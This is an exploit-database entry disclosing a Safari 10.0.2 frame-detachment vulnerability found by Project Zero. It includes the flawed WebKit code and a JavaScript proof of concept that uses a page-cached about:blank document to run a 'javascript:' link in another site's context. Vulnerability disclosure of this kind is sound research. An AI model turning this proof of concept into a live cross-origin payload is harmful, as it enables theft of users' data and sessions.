header-logo
Suggest Exploit
vendor:
Safari
by:
Project Zero
8,8
CVSS
HIGH
Frame Detachment Vulnerability
20
CWE
Product Name: Safari
Affected Version From: Safari 10.0.2
Affected Version To: Safari 10.0.2
Patch Exists: YES
Related CWE: N/A
CPE: a:apple:safari:10.0.2
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Mac
2017

Frame Detachment Vulnerability in Safari

The Frame::setDocument() function in Safari does not properly detach the frame from the cached document. This can be exploited to execute arbitrary code in the context of the cached document by creating an element with a malicious href attribute and clicking it.

Mitigation:

Upgrade to the latest version of Safari.
Source

Exploit-DB raw data:

<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1056

void Frame::setDocument(RefPtr<Document>&& newDocument)
{
    ASSERT(!newDocument || newDocument->frame() == this);

    if (m_doc && m_doc->pageCacheState() != Document::InPageCache)
        m_doc->prepareForDestruction();

    m_doc = newDocument.copyRef();
    ...
}

The function |prepareForDestruction| only called when the cache state is not |Document::InPageCache|. So the frame will be never detached from the cached document.

PoC:
-->

"use strict";

document.write("click anywhere to start");

window.onclick = () => {
    let w = open("about:blank", "one");
    let d = w.document;

    let a = d.createElement("a");
    a.href = "https://abc.xyz/";
    a.click();  <<------- about:blank -> Document::InPageCache

    let it = setInterval(() => {
        try {
            w.location.href.toString;
        } catch (e) {
            clearInterval(it);

            let s = d.createElement("a");  <<------ about:blank's document
            s.href = "javascript:alert(location)";
            s.click();
        }
    }, 0);
};


<!--
Tested on Safari 10.0.2(12602.3.12.0.1).
-->